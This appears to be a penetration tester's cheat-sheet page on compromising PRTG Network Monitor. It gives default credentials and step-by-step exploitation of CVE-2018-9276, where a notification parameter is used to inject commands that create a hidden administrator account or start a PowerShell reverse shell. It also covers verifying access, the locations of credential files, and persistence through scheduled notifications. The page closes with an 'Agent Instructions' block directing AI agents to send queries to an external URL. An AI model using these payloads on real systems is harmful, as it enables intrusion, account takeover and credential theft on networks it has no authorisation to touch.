# PRTG Network Monitor ## Discovery * Default ports: 80, 443, 8080 * Nmap shows: `Indy httpd (Paessler PRTG bandwidth monitor)` * Default creds: `prtgadmin:prtgadmin` ```bash # Version check curl -s http://TARGET:8080/index.htm -A "Mozilla/5.0" | grep prtgversion ``` *** ## Command Injection (CVE-2018-9276) **Affects:** PRTG < 18.2.39 ### Exploit Steps 1. Login to PRTG admin panel 2. `Setup → Account Settings → Notifications` 3. Click `Add new notification` 4. Give it a name (e.g., "pwn") 5. Scroll down, check `EXECUTE PROGRAM` 6. Select: `Demo exe notification - outfile.ps1` 7. In Parameter field: ``` test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add ``` 8. Click `Save` 9. Click `Test` on the notification ### Alternative - Reverse Shell Parameter ``` test.txt;powershell -e JABjAGwAaQBlAG4AdAA9...BASE64_PAYLOAD ``` ### Verify Access ```bash nxc smb TARGET -u prtgadm1 -p 'Pwn3d_by_PRTG!' ``` *** ## Credential Locations ``` # Windows C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.dat C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak ``` Search for `` in config files. *** ## Persistence Can schedule notification to run at specific times for persistent callback. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/prtg.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.